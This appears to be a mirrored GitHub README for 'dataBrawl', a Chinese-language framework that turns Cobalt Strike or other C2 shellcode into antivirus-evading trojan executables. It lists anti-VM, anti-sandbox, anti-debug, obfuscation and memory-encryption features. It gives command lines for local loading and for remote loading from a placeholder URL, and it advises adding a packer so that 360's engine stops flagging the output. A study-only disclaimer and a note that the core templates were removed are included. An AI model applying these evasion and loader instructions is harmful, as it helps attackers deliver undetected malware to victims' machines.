GithubHelp home page GithubHelp logo

cherno-x / databrawl Goto Github PK

View Code? Open in Web Editor NEW
144.0 1.0 18.0 22.79 MB

一键生成免杀木马的 shellcode 免杀框架

Batchfile 2.48% Python 62.49% C++ 14.85% C 20.18%
antivirus infosec redteam redteam-tools security-tools shellcode

databrawl's Introduction

dataBrawl

(2024年6月28日注:大型活动期间暂停维护,已删除核心template)

dataBrawl

一款一键化生成免杀木马的shellcode免杀框架,具备本地加载方式和远程加载方式。

Feature

  1. 本地/分离加载
  2. ollvm混淆编译/gcc编译
  3. IAT obfuscate
  4. Anti-VM
  5. Anti-Sandbox(API Hammering,自定义sleep)
  6. Anti-Debug
  7. 内存加密
  8. add resource/sign

环境准备

本工具使用mingw或ollvm编译,ollvm编译无需准备编译环境(生成exe较大,qvm需额外操作)

使用mingw编译需要准备好编译环境,下载mingw编译器:

官网地址:https://www.mingw-w64.org/

Windows下载链接: https://sourceforge.net/projects/mingw-w64/files/

我下载的是x86_64-win32-seh,具体请根据系统情况适配,也可以直接下载online installer

image-20240417134130271

添加系统环境变量:

path = 解压目录/mingw64/bin

最好把include和lib也对应添加到环境变量的include和lib中,以免编译找不到链接库

使用说明

python dataBrawl.py -h

image-20240625170435636

本地加载shellcode

CS或其他C2生成shellcode

image-20240417140327230

-i 指复制目标exe的资源、图标和签名信息

python dataBrawl.py D:\Dev\dataBrawl\payload_x64.bin -b 1 -t stdtemp -i "C:\Users\xxx"

image-20240625170651334

默认在项目跟目录生成result.exe,也可-o指定输出位置

这里是使用gcc编译,目前qvm未报毒,ollvm编译把-b选项输入2,目前qvm存在问题,可以再加个壳,我这里使用enigma protector ,自己大概选择配置下,qvm都无法拦截。https://down.52pojie.cn/Tools/Packers/The_Enigma_Protector_v7.40_x32_x64.rar 不过qvm比较玄学,可能过两天就报毒了,可以直接ollvm编译+壳。

image-20240626110232217

使用ollvm加壳后如果还杀,就改一下加壳的选项。

远程加载shellcode

先生成加密shellcode

python dataBrawl.py D:\Dev\dataBrawl\payload_x64.bin -c 1 -t remote

使用远程模板生成木马

python dataBrawl.py http://www.xxx.com/shellcode.bin -b 1 -t remote -i "C:\Users\xxx"

⚠️ Warning

免责声明: 请注意,本仓库仅用于学习和研究目的。在使用任何与恶意软件开发相关的技术时,请遵守当地法律法规,不要进行任何违法活动。对于任何不当使用造成的后果,本仓库的维护者不承担任何责任。

欢迎提出建议、报告漏洞或贡献代码以改进本仓库的内容。让我们共同努力,提高网络安全意识和技术水平!

databrawl's People

Contributors

cherno-x avatar

Stargazers

Pixel pilot avatar f1rebyte avatar Xeonacid avatar  avatar magiccommandline avatar changheluori007 avatar 平芜尽处外 avatar Iam0x17 avatar LASTNAME.RADEON avatar rabbit avatar emaker avatar  avatar  avatar  avatar  avatar  avatar  avatar 111111111111 avatar evi1ox avatar  avatar  avatar Sakura501 avatar  avatar TimmyTseng avatar  avatar  avatar 求怕累 avatar DummyKitty avatar  avatar 阿信 avatar  avatar evi1cg avatar Heidenreich avatar xsshim avatar  avatar  avatar Toin avatar What's wrong avatar BackDoor avatar  avatar Hand Sonic avatar  avatar vvan9 avatar 击势安全团队 avatar  avatar 18cm avatar  avatar  avatar Bot Molu avatar  avatar  avatar LSA avatar H4wkeye avatar NoGreen avatar Abell avatar  avatar  avatar uaqHahqa avatar  avatar  avatar 56 avatar  yangxiaolong avatar MuxuHK avatar WebCode avatar CrE0m avatar  avatar mayter avatar aubrey avatar  avatar qiudaxia134 avatar P1an0 avatar  avatar  avatar wuhJ avatar sukura avatar b1ank avatar onewin avatar GKDshell avatar  avatar  avatar ddwGeGe avatar cmz avatar  avatar  avatar  avatar thelostworld avatar  avatar  avatar Aruil avatar JokerMask avatar nu11 avatar  avatar  avatar  avatar GithubAutoBackupBot avatar Swites avatar Arm!tage avatar 之乎者也 avatar  avatar  avatar

Watchers

 avatar

databrawl's Issues

down

Remote loading, denfender was killed as soon as it came online

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.